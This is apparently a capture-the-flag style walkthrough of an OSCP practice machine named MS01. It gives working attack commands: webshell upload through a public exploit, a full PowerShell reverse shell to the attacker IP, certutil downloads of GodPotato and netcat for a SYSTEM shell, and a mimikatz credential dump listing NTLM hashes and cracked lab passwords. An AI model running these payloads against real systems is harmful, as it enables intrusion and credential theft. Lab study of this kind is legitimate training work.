192.168.249.141 (MS01)

Enumeration

sudo nmap -sV -A -T4 -p- 192.168.129.141 -Pn -o target.fullmap141

gobuster dir -u http://192.168.129.141 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 42 -b 400,401,403,404 -f -o target.gobuster141

gobuster dir -u http://192.168.129.141:81 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 42 -b 400,401,403,404 -f -o target.gobuster14181

hashcat -m 3200 "\$2y\$10\$fCOiMky4n5hCJx3cpsG20Od4wHtlkCLKmO6VLobJNRIg9ooHTkgjK" ../Crystal/rockyou.txt

Username	Password	Hash	Hash Type
nurhodelta	password	$2y$10$fCOiMky4n5hCJx3cpsG20Od4wHtlkCLKmO6VLobJNRIg9ooHTkgjK	bcrypt

• Apparently this is a rabbit hole, we are supposed to exploit the service itself

Exploitation

searchsploit -m 50801.py
mousepad 50801.py

Modified the following:

Upload Webshell:
 python3 50801.py http://192.168.129.141:81
 
Can also be verified by accessing:
 http://192.168.129.141:81/images/shell.php?cmd=whoami

Initial Foothold

Using revshell.com, we can generate a powershell command to initiate a reverse shell

URL encoded Reverse Shell
powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.205%27%2C4444%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22


On Kali machine:
 nc -lnvp 4444
  > Access http://192.168.129.141:81/images/shell.php with the URL encoded reverse shell added as an argument for the cmd variable

OR

• Get the reverse shell as mary regardless

whoami
whoami /priv
whoami /groups

Privilege Escalation

certutil -urlcache -split -f http://192.168.45.205/GodPotato-NET4.exe
./GodPotato-NET4.exe -cmd "hostname"
 > Verify that GodPotato works

On Kali machine:
 nc -lnvp 5555
 
On Victim machine:
 certutil -urlcache -split -f http://192.168.45.205/nc64.exe
 ./GodPotato-NET4.exe -cmd "C:\Users\Mary.Williams\Documents\nc64.exe 192.168.45.205 5555 -t -e cmd"

We get a shell, but some commands do not seem to be working as intended

Alternate Method with PrintSpoofer

• The example provided is done after the change made to match the OSCP+ exam format

  • Eric Wallows is a credential set provided, and is used to start a ssh connection with .141

  • Running whoami /priv shows us that Eric has the same permissions as Mary Williams, hence the approach to priv escalate ended up being the same

certutil -urlcache -split -f http://192.168.45.205/mimikatz.exe
mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "sekurlsa::logonpasswords" "exit"

Interesting Information
 User : Administrator
  * Domain   : MS01
  * NTLM     : 3c4495bbd678fac8c9d218be4f2bbc7b

 User : Mary.Williams
  * Domain   : MS01
  * NTLM     : 9a3121977ee93af56ebd0ef4f527a35e

 User : eric.wallows
  * Domain   : OSCP
  * NTLM     : a1f18f9362b5485cca07aedda6792454

 User : celia.almeda
  * Domain   : OSCP
  * NTLM     : e728ecbadfb02f51ce8eed753f3ff3fd

Username	Password	NTLM Hash
MS01/Administrator	December31	3c4495bbd678fac8c9d218be4f2bbc7b
MS01/Mary.Williams	< Cannot be cracked >	9a3121977ee93af56ebd0ef4f527a35e
OSCP/eric.wallows	EricLikesRunning800	a1f18f9362b5485cca07aedda6792454
OSCP/celia.almeda		e728ecbadfb02f51ce8eed753f3ff3fd

• Good to know that celia.almeda is an active account